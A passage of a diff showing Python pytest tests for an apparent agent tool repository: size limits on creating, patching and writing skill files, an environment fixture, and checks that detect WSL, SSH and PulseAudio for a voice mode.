assert "100,000" in result["error"]
|
||||
|
||||
|
||||
class TestPatchSkillSizeLimit:
|
||||
"""patch action checks resulting size, not just the new_string."""
|
||||
|
||||
def test_patch_that_would_exceed_limit(self, isolate_skills):
|
||||
# Create a skill near the limit
|
||||
near_limit = _make_skill_content(MAX_SKILL_CONTENT_CHARS - 50)
|
||||
json.loads(skill_manage(action="create", name="near-limit", content=near_limit))
|
||||
|
||||
# Patch that adds enough to go over
|
||||
result = json.loads(skill_manage(
|
||||
action="patch",
|
||||
name="near-limit",
|
||||
old_string="# Test Skill",
|
||||
new_string="# Test Skill\n" + ("y" * 200),
|
||||
))
|
||||
assert result["success"] is False
|
||||
assert "100,000" in result["error"]
|
||||
|
||||
def test_patch_that_reduces_size_on_oversized_skill(self, isolate_skills, tmp_path):
|
||||
"""Patches that shrink an already-oversized skill should succeed."""
|
||||
# Manually create an oversized skill (simulating hand-placed)
|
||||
skill_dir = tmp_path / "skills" / "bloated"
|
||||
skill_dir.mkdir(parents=True)
|
||||
oversized = _make_skill_content(MAX_SKILL_CONTENT_CHARS + 5000)
|
||||
oversized = oversized.replace("name: test-skill", "name: bloated")
|
||||
(skill_dir / "SKILL.md").write_text(oversized, encoding="utf-8")
|
||||
assert len(oversized) > MAX_SKILL_CONTENT_CHARS
|
||||
|
||||
# Patch that removes content to bring it under the limit.
|
||||
# Use replace_all to replace the repeated x's with a shorter string.
|
||||
result = json.loads(skill_manage(
|
||||
action="patch",
|
||||
name="bloated",
|
||||
old_string="x" * 100,
|
||||
new_string="y",
|
||||
replace_all=True,
|
||||
))
|
||||
# Should succeed because the result is well within limits
|
||||
assert result["success"] is True
|
||||
|
||||
def test_patch_supporting_file_size_limit(self, isolate_skills):
|
||||
"""Patch on a supporting file also checks size."""
|
||||
small = _make_skill_content(1000)
|
||||
json.loads(skill_manage(action="create", name="with-ref", content=small))
|
||||
# Create a supporting file
|
||||
json.loads(skill_manage(
|
||||
action="write_file",
|
||||
name="with-ref",
|
||||
file_path="references/data.md",
|
||||
file_content="# Data\n\nSmall content.",
|
||||
))
|
||||
# Try to patch it to be oversized
|
||||
result = json.loads(skill_manage(
|
||||
action="patch",
|
||||
name="with-ref",
|
||||
old_string="Small content.",
|
||||
new_string="x" * (MAX_SKILL_CONTENT_CHARS + 100),
|
||||
file_path="references/data.md",
|
||||
))
|
||||
assert result["success"] is False
|
||||
assert "references/data.md" in result["error"]
|
||||
|
||||
|
||||
class TestWriteFileSizeLimit:
|
||||
"""write_file action enforces both char and byte limits."""
|
||||
|
||||
def test_write_file_over_char_limit(self, isolate_skills):
|
||||
small = _make_skill_content(1000)
|
||||
json.loads(skill_manage(action="create", name="file-test", content=small))
|
||||
|
||||
result = json.loads(skill_manage(
|
||||
action="write_file",
|
||||
name="file-test",
|
||||
file_path="references/huge.md",
|
||||
file_content="x" * (MAX_SKILL_CONTENT_CHARS + 1),
|
||||
))
|
||||
assert result["success"] is False
|
||||
assert "100,000" in result["error"]
|
||||
|
||||
def test_write_file_within_limit(self, isolate_skills):
|
||||
small = _make_skill_content(1000)
|
||||
json.loads(skill_manage(action="create", name="file-ok", content=small))
|
||||
|
||||
result = json.loads(skill_manage(
|
||||
action="write_file",
|
||||
name="file-ok",
|
||||
file_path="references/normal.md",
|
||||
file_content="# Normal\n\n" + ("x" * 5000),
|
||||
))
|
||||
assert result["success"] is True
|
||||
|
||||
|
||||
class TestHandPlacedSkillsNoLimit:
|
||||
"""Skills dropped directly on disk are not constrained."""
|
||||
|
||||
def test_oversized_handplaced_skill_loads(self, isolate_skills, tmp_path):
|
||||
"""A hand-placed 200k skill can still be read via skill_view."""
|
||||
from tools.skills_tool import skill_view
|
||||
|
||||
skill_dir = tmp_path / "skills" / "manual-giant"
|
||||
skill_dir.mkdir(parents=True)
|
||||
huge = _make_skill_content(200_000)
|
||||
huge = huge.replace("name: test-skill", "name: manual-giant")
|
||||
(skill_dir / "SKILL.md").write_text(huge, encoding="utf-8")
|
||||
|
||||
result = json.loads(skill_view("manual-giant"))
|
||||
assert "content" in result
|
||||
# The full content is returned — no truncation at the storage layer
|
||||
assert len(result["content"]) > MAX_SKILL_CONTENT_CHARS
|
||||
|
|
@ -18,6 +18,11 @@ import pytest
|
|||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
@pytest.fixture(autouse=True)
|
||||
def _clear_openai_env(monkeypatch):
|
||||
monkeypatch.delenv("OPENAI_API_KEY", raising=False)
|
||||
|
||||
|
||||
class TestGetProvider:
|
||||
"""_get_provider() picks the right backend based on config + availability."""
|
||||
|
||||
|
|
|
|||
|
|
@ -56,6 +56,134 @@ def mock_sd(monkeypatch):
|
|||
return mock
|
||||
|
||||
|
||||
# ============================================================================
|
||||
# detect_audio_environment — WSL / SSH / Docker detection
|
||||
# ============================================================================
|
||||
|
||||
class TestDetectAudioEnvironment:
|
||||
def test_clean_environment_is_available(self, monkeypatch):
|
||||
"""No SSH, Docker, or WSL — should be available."""
|
||||
monkeypatch.delenv("SSH_CLIENT", raising=False)
|
||||
monkeypatch.delenv("SSH_TTY", raising=False)
|
||||
monkeypatch.delenv("SSH_CONNECTION", raising=False)
|
||||
monkeypatch.setattr("tools.voice_mode._import_audio",
|
||||
lambda: (MagicMock(), MagicMock()))
|
||||
|
||||
from tools.voice_mode import detect_audio_environment
|
||||
result = detect_audio_environment()
|
||||
assert result["available"] is True
|
||||
assert result["warnings"] == []
|
||||
|
||||
def test_ssh_blocks_voice(self, monkeypatch):
|
||||
"""SSH environment should block voice mode."""
|
||||
monkeypatch.setenv("SSH_CLIENT", "1.2.3.4 54321 22")
|
||||
monkeypatch.setattr("tools.voice_mode._import_audio",
|
||||
lambda: (MagicMock(), MagicMock()))
|
||||
|
||||
from tools.voice_mode import detect_audio_environment
|
||||
result = detect_audio_environment()
|
||||
assert result["available"] is False
|
||||
assert any("SSH" in w for w in result["warnings"])
|
||||
|
||||
def test_wsl_without_pulse_blocks_voice(self, monkeypatch, tmp_path):
|
||||
"""WSL without PULSE_SERVER should block voice mode."""
|
||||
monkeypatch.delenv("SSH_CLIENT", raising=False)
|
||||
monkeypatch.delenv("SSH_TTY", raising=False)
|
||||
monkeypatch.delenv("SSH_CONNECTION", raising=False)
|
||||
monkeypatch.delenv("PULSE_SERVER", raising=False)
|
||||
monkeypatch.setattr("tools.voice_mode._import_audio",
|
||||
lambda: (MagicMock(), MagicMock()))
|
||||
|
||||
proc_version = tmp_path / "proc_version"
|
||||
proc_version.write_text("Linux 5.15.0-microsoft-standard-WSL2")
|
||||
|
||||
_real_open = open
|
||||
def _fake_open(f, *a, **kw):
|
||||
if f == "/proc/version":
|
||||
return _real_open(str(proc_version), *a, **kw)
|
||||
return _real_open(f, *a, **kw)
|
||||
|
||||
with patch("builtins.open", side_effect=_fake_open):
|
||||
from tools.voice_mode import detect_audio_environment
|
||||
result = detect_audio_environment()
|
||||
|
||||
assert result["available"] is False
|
||||
assert any("WSL" in w for w in result["warnings"])
|
||||
assert any("PulseAudio" in w for w in result["warnings"])
|
||||
|
||||
def test_wsl_with_pulse_allows_voice(self, monkeypatch, tmp_path):
|
||||
"""WSL with PULSE_SERVER set should NOT block voice mode."""
|
||||
monkeypatch.delenv("SSH_CLIENT", raising=False)
|
||||
monkeypatch.delenv("SSH_TTY", raising=False)
|
||||
monkeypatch.delenv("SSH_CONNECTION", raising=False)
|
||||
monkeypatch.setenv("PULSE_SERVER", "unix:/mnt/wslg/PulseServer")
|
||||
monkeypatch.setattr("tools.voice_mode._import_audio",
|
||||
lambda: (MagicMock(), MagicMock()))
|
||||
|
||||
proc_version = tmp_path / "proc_version"
|
||||
proc_version.write_text("Linux 5.15.0-microsoft-standard-WSL2")
|
||||
|
||||
_real_open = open
|
||||
def _fake_open(f, *a, **kw):
|
||||
if f == "/proc/version":
|
||||
return _real_open(str(proc_version), *a, **kw)
|
||||
return _real_open(f, *a, **kw)
|
||||
|
||||
with patch("builtins.open", side_effect=_fake_open):
|
||||
from tools.voice_mode import detect_audio_environment
|
||||
result = detect_audio_environment()
|
||||
|
||||
assert result["available"] is True
|
||||
assert result["warnings"] == []
|
||||
assert any("WSL" in n for n in result.get("notices", []))
|
||||
|
||||
def test_wsl_device_query_fails_with_pulse_continues(self, monkeypatch, tmp_path):
|
||||
"""WSL device query failure should not block if PULSE_SERVER is set."""
|
||||
monkeypatch.delenv("SSH_CLIENT", raising=False)
|
||||
monkeypatch.delenv("SSH_TTY", raising=False)
|
||||
monkeypatch.delenv("SSH_CONNECTION", raising=False)
|
||||
monkeypatch.setenv("PULSE_SERVER", "unix:/mnt/wslg/PulseServer")
|
||||
|
||||
mock_sd = MagicMock()
|
||||
mock_sd.query_devices.side_effect = Exception("device query failed")
|
||||
monkeypatch.setattr("tools.voice_mode._import_audio",
|
||||
lambda: (mock_sd, MagicMock()))
|
||||
|
||||
proc_version = tmp_path / "proc_version"
|
||||
proc_version.write_text("Linux 5.15.0-microsoft-standard-WSL2")
|
||||
|
||||
_real_open = open
|
||||
def _fake_open(f, *a, **kw):
|
||||
if f == "/proc/version":
|
||||
return _real_open(str(proc_version), *a, **kw)
|
||||
return _real_open(f, *a, **kw)
|
||||
|
||||
with patch("builtins.open", side_effect=_fake_open):
|
||||
from tools.voice_mode import detect_audio_environment
|
||||
result = detect_audio_environment()
|
||||
|
||||
assert result["available"] is True
|
||||
assert any("device query failed" in n for n in result.get("notices", []))
|
||||
|
||||
def test_device_query_fails_without_pulse_blocks(self, monkeypatch):
|
||||
"""Device query failure without PULSE_SERVER should block."""
|
||||
monkeypatch.delenv("SSH_CLIENT", raising=False)
|
||||
monkeypatch.delenv("SSH_TTY", raising=False)
|
||||
monkeypatch.delenv("SSH_CONNECTION", raising=False)
|
||||
monkeypatch.delenv("PULSE_SERVER", raising=False)
|
||||
|
||||
mock_sd = MagicMock()
|
||||
mock_sd.query_devices.side_effect = Exception("device query failed")
|
||||
monkeypatch.setattr("tools.voice_mode._import_audio",
|
||||
lambda: (mock_sd, MagicMock()))
|
||||
|
||||
from tools.voice_mode import detect_audio_environment
|
||||
result = detect_audio_environment()
|
||||
|
||||
assert result["available"] is False
|
||||
assert any("PortAudio" in w for w in result["warnings"])
|
||||
|
||||
|
||||
# ============================================================================
|
||||
# check_voice_requirements
|
||||
# ============================================================================
|
||||
|
|
|
|||
Loading…
Add table
Add a link
Reference in a new issue